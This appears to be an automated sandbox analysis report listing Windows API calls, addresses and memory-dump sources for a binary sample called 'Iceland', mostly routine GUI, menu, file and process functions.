                                                                                                                                                                                                                                                                • BeginPaint.USER32(?,?,?), ref: 00A21B35
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00A21B99
                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00A21BB6
                                                                                                                                                                                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00A21BC7
                                                                                                                                                                                                                                                                • EndPaint.USER32(?,?,?,?,?), ref: 00A21C15
                                                                                                                                                                                                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00A63287
                                                                                                                                                                                                                                                                  • Part of subcall function 00A21C2D: BeginPath.GDI32(00000000), ref: 00A21C4B
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3050599898-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 00A911B3
                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00A911EE
                                                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00A9120A
                                                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00A91283
                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00A9129A
                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00A912C8
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3368777196-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00A7FBEF,00000000,?,?,00000000,?,00A639E2,00000004,00000000,00000000), ref: 00AB8CA7
                                                                                                                                                                                                                                                                • EnableWindow.USER32(?,00000000), ref: 00AB8CCD
                                                                                                                                                                                                                                                                • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00AB8D2C
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000004), ref: 00AB8D40
                                                                                                                                                                                                                                                                • EnableWindow.USER32(?,00000001), ref: 00AB8D66
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00AB8D8A
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 642888154-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32(?,?,00000000), ref: 00AA2D45
                                                                                                                                                                                                                                                                  • Part of subcall function 00A9EF33: GetWindowRect.USER32(?,?), ref: 00A9EF4B
                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00AA2D6F
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 00AA2D76
                                                                                                                                                                                                                                                                • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00AA2DB2
                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 00AA2DDE
                                                                                                                                                                                                                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00AA2E3C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2387181109-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 00A855F9
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00A85616
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00A8564E
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A8566C
                                                                                                                                                                                                                                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00A85674
                                                                                                                                                                                                                                                                • _wcsstr.LIBVCRUNTIME ref: 00A8567E
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 72514467-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A25851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A255D1,?,?,00A64B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00A25871
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A962C0
                                                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00A963DA
                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(00AC0CC4,00000000,00000001,00AC0B34,?), ref: 00A963F3
                                                                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 00A96411
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                                                                                                • String ID: .lnk
                                                                                                                                                                                                                                                                • API String ID: 3172280962-24824748
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00AB8740
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00AB8765
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00AB877D
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 00AB87A6
                                                                                                                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00A9C1F2,00000000), ref: 00AB87C6
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A224B0
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 00AB87B1
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2294984445-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00A436E9,00A43355), ref: 00A43700
                                                                                                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A4370E
                                                                                                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A43727
                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,00A436E9,00A43355), ref: 00A43779
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,00A44D53,00000000,?,?,00A468E2,?,?,00000000), ref: 00A530EB
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5311E
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A53146
                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,00000000), ref: 00A53153
                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,00000000), ref: 00A5315F
                                                                                                                                                                                                                                                                • _abort.LIBCMT ref: 00A53165
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A21F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A21F87
                                                                                                                                                                                                                                                                  • Part of subcall function 00A21F2D: SelectObject.GDI32(?,00000000), ref: 00A21F96
                                                                                                                                                                                                                                                                  • Part of subcall function 00A21F2D: BeginPath.GDI32(?), ref: 00A21FAD
                                                                                                                                                                                                                                                                  • Part of subcall function 00A21F2D: SelectObject.GDI32(?,00000000), ref: 00A21FD6
                                                                                                                                                                                                                                                                • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00AB94AA
                                                                                                                                                                                                                                                                • LineTo.GDI32(?,00000003,00000000), ref: 00AB94BE
                                                                                                                                                                                                                                                                • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00AB94CC
                                                                                                                                                                                                                                                                • LineTo.GDI32(?,00000000,00000003), ref: 00AB94DC
                                                                                                                                                                                                                                                                • EndPath.GDI32(?), ref: 00AB94EC
                                                                                                                                                                                                                                                                • StrokePath.GDI32(?), ref: 00AB94FC
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 43455801-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 00A85B7C
                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00A85B8D
                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A85B94
                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00A85B9C
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00A85BB3
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00A85BC5
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A232AF
                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00A232B7
                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A232C2
                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A232CD
                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00A232D5
                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A232DD
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Virtual
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4278518827-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00A8F447
                                                                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00A8F45D
                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00A8F46C
                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A8F47B
                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A8F485
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A8F48C
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 839392675-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?), ref: 00A634EF
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 00A63506
                                                                                                                                                                                                                                                                • GetWindowDC.USER32(?), ref: 00A63512
                                                                                                                                                                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 00A63521
                                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00A63533
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000005), ref: 00A6354D
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 272304278-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A821CC
                                                                                                                                                                                                                                                                • UnloadUserProfile.USERENV(?,?), ref: 00A821D8
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00A821E1
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00A821E9
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00A821F2
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A821F9
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 146765662-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A241EA: _wcslen.LIBCMT ref: 00A241EF
                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A8CF99
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A8CFE0
                                                                                                                                                                                                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A8D047
                                                                                                                                                                                                                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00A8D075
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                • API String ID: 1227352736-4108050209
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ShellExecuteExW.SHELL32(0000003C), ref: 00AAB903
                                                                                                                                                                                                                                                                  • Part of subcall function 00A241EA: _wcslen.LIBCMT ref: 00A241EF
                                                                                                                                                                                                                                                                • GetProcessId.KERNEL32(00000000), ref: 00AAB998
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00AAB9C7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                                                • String ID: <$@
                                                                                                                                                                                                                                                                • API String ID: 146682121-1426351568
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00A87B6D
                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00A87BA3
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00A87BB4
                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00A87C36
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                                                                                                • String ID: DllGetClassObject
                                                                                                                                                                                                                                                                • API String ID: 753597075-1075368562
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AB48D1
                                                                                                                                                                                                                                                                • IsMenu.USER32(?), ref: 00AB48E6
                                                                                                                                                                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AB492E
                                                                                                                                                                                                                                                                • DrawMenuBar.USER32 ref: 00AB4941
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                  • Part of subcall function 00A845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A84620
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00A827B3
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00A827C6
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 00A827F6
                                                                                                                                                                                                                                                                  • Part of subcall function 00A28577: _wcslen.LIBCMT ref: 00A2858A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                • API String ID: 2081771294-1403004172
